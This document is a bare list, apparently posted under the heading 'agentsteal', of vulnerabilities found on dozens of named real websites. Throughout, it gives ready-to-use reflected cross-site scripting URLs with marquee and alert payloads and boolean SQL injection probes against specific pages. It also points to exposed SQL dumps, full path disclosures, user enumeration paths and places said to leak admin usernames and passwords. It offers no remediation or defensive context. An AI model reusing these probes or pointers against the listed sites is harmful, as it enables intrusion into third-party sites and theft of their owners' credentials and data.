agentsteal

Full Path Disclosure: http://home.acdx.net/g/list.php Full Path Disclosure: http://home.acdx.net/g/view.php Includes Directory: http://home.acdx.net/files/

Cross Site Scripting: http://www.iwonderdesigns.com/nexus/demo/index.php?</script><marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code. Cross Site Scripting: There is Cross Site Scripting if your password contains ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code. Full Path Disclosure: Includes Directory: http://www.iwonderdesigns.com/includes/ Includes Directory: http://www.iwonderdesigns.com/nexus/demo/include/ SQL Injection: http://www.iwonderdesigns.com/nexus/demo/index.php?a=view_doc&id=6 AND 1=1 http://www.iwonderdesigns.com/nexus/demo/index.php?a=view_doc&id=6 AND 1=2 User Enumeration: http://www.iwonderdesigns.com/~root User Enumeration: http://www.iwonderdesigns.com/~iwonderd

Cross Site Scripting: http://www.fustrate.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.fustrate.com/cgi-sys/scgiwrap/ User Enumeration: http://www.che55.com/~root

Cross Site Scripting: http://www.fustrate.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if your password contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Full Path Disclosure: http://www.fustrate.com/cgi-sys/scgiwrap/ Log: http://www.fustrate.com/log.txt User Enumeration: http://www.fustrate.com/~hoffman User Enumeration: http://www.fustrate.com/~root

Admin Access: The SQL Injection in the forum reveals your password. Full Path Disclosure: http://www.klubdeutsch.com/view_topic.php SQL injection: http://www.klubdeutsch.com/view_topic.php?topic_id=56 AND 1=1 http://www.klubdeutsch.com/view_topic.php?topic_id=56 AND 1=2 User Enumeration: http://www.klubdeutsch.com/~klubiyfn User Enumeration: http://www.klubdeutsch.com/~root

Array: http://www.policosmos.com/citizenshall.php?start[] Array: http://www.policosmos.com/table.php?topic=0&start[] Array: http://www.policosmos.com/table.php?topic[] Cross Site Scripting: http://www.policosmos.com/addfriend.php?delete="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/browse.php?show=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/citizenshall.php?start=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/endorse.php?delete="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.policosmos.com/phpinfo.php?<script>alert('vulnerable')</script> Cross Site Scripting: http://www.policosmos.com/submit_reg.php?email=<marquee><h1>vulnerable</marquee> Cross Site Scripting: There is Cross Site Scripting if the issues section contains code. Cross Site Scripting: There is Cross Site Scripting when you register if the fields contain code. Full Path Disclosure: http://www.policosmos.com/browse.php Full Path Disclosure: http://www.policosmos.com/citizenshall.php Full Path Disclosure: http://www.policosmos.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://www.policosmos.com/phpinfo.php Full Path Disclosure: http://www.policosmos.com/table.php?topic=0&start[] Full Path Disclosure: http://www.policosmos.com/test.php Full Path Disclosure: There is Full Path Disclosure when you register. Full Path Disclosure: There is Full Path Disclosure if you upload an invalid avatar. Maximum Length: If you edit the input boxes when you register you can remove the maximum lengths. SQL Injection: http://www.policosmos.com/blog.php?delete=36 AND 1=1 http://www.policosmos.com/blog.php?delete=36 AND 1=2 SQL Injection: http://www.policosmos.com/browse.php?find=endorsements&user=107 AND 1=1 http://www.policosmos.com/browse.php?find=endorsements&user=107 AND 1=2 SQL Injection: http://www.policosmos.com/mail.php?delete=211 AND 1=1 http://www.policosmos.com/mail.php?delete=211 AND 1=2 User Enumeration: http://www.policosmos.com/~policosmos User Enumeration: http://www.policosmos.com/~root User Enumeration: http://www.policosmos.com/~zeus

Cross Site Scripting: http://www.tutorialstuff.com/cgi-sys/scgiwrap/<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.tutorialstuff.com/tutorial_category.php?category=<marquee><h1>vulnerable</marquee> Full Path Disclosure: http://www.tutorialstuff.com/cgi-sys/scgiwrap/ Full Path Disclosure: http://www.tutorialstuff.com/?s SQL Injection: http://www.tutorialstuff.com/tutorial_display.php?id=100 AND 1=1 http://www.tutorialstuff.com/tutorial_display.php?id=100 AND 1=2 User Enumeration: http://www.tutorialstuff.com/~tinymike

Cross Site Scripting: There is Cross Site Scripting if your password contains ">code. Cross Site Scripting: There is Cross Site Scripting if your username contains ">code.

Admin Access: Your thumbs.db files contain your username and password.

SQL Dump: http://www.blushcentral.com/sql/

Admin Access: You can post news without logging in. Cross Site Scripting: There is Cross Site Scripting if you post a comment that contains code. Cross Site Scripting: There is Cross Site Scripting if you post news that contains code.

Cross Site Scripting: There is Cross Site Scripting if your username contains code.

Cross Site Scripting: There is Cross Site Scripting if your password contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. SQL Dump: http://www.mp3crib.com/sql/

Cross Site Scripting: There is Cross Site Scripting if the Expect header contains code. Cross Site Scripting: There is Cross Site Scripting if your username contains code. Drop Down Menu: If you edit the drop down menu on http://www.uklovebug.co.uk/rate_me.php you can submit arbitrary values. User Enumeration: http://www.uklovebug.co.uk/~root

Multiple users can register with the same username. User Enumeration: http://www.chatcubed.com/~root

Full Path Disclosure: http://yaz.pixelradio.net/includes/footer.php Full Path Disclosure: http://yaz.pixelradio.net/~yaz PHP Source Code Disclosure: http://yaz.pixelradio.net/*******/*****.txt User Enumeration: http://yaz.pixelradio.net/~yaz

Cross Site Scripting: http://www.thefreebielife.com/<marquee><h1>vulnerable</marquee>

Cross Site Scripting: http://www.skatevid.net/upload/uu_finished.php?temp_dir=<marquee><h1>vulnerable</marquee>

SQL Injection: http://www.rockypages.com/classified_type?type=1 AND 1=1 http://www.rockypages.com/classified_type?type=1 AND 1=2

Cross Site Scripting: http://www.ibswebview.com/phpinfo.php?<script>alert('vulnerable')</script> Full Path Disclosure: http://www.ibswebview.com/phpinfo.php User Enumeration: http://www.ibswebview.com/~root

Admin Access: http://www.corlewland.com/church/home/ contains your username and password. Cross Site Scripting: http://www.corlewland.com/church/biblesearch.php?book_name=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/calendar.php?day=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/prayer_request.php?pagein=<marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.corlewland.com/church/printc.php?usage=<marquee><h1>vulnerable</marquee> Drop Down Menu: If you edit the drop down menu on http://www.corlewland.com/guestbook.php you can submit arbitrary values. PHP Source Code Disclosure: http://www.corlewland.com/church/home/ User Enumeration: http://www.corlewland.com/~root

Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/admin-footer.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/admin-functions.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form-advanced.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form-comment.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-link-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/edit-page-form.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/menu-header.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-admin/menu.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/default-filters.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/kses.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/locale.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/rss-functions.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/template-loader.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/vars.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-includes/wp-db.php Full Path Disclosure: http://www.mattdsworld.com/wp/wp-settings.php User Enumeration: http://www.mattdsworld.com/~root

Full Path Disclosure: http://fusionware.ourproject.org/itech/microforum/newprofile.php User Enumeration: http://fusionware.ourproject.org/~root

Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?email="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?name="><marquee><h1>vulnerable</marquee> Cross Site Scripting: http://www.podja.co.uk/billing/contact.php?subject="><marquee><h1>vulnerable</marquee> User Enumeration: http://www.podja.co.uk/~root

Cross Site Scripting: [url=http://www.file-city.co.uk/phpinfo.php?<script>alert('vulnerable')</script>]http://www.file-city.co.uk/phpinfo.php?<script>alert('vulnerable')</script>[/url] Full Path Disclosure: [url=http://www.file-city.co.uk/phpinfo.php]http://www.file-city.co.uk/phpinfo.php[/url]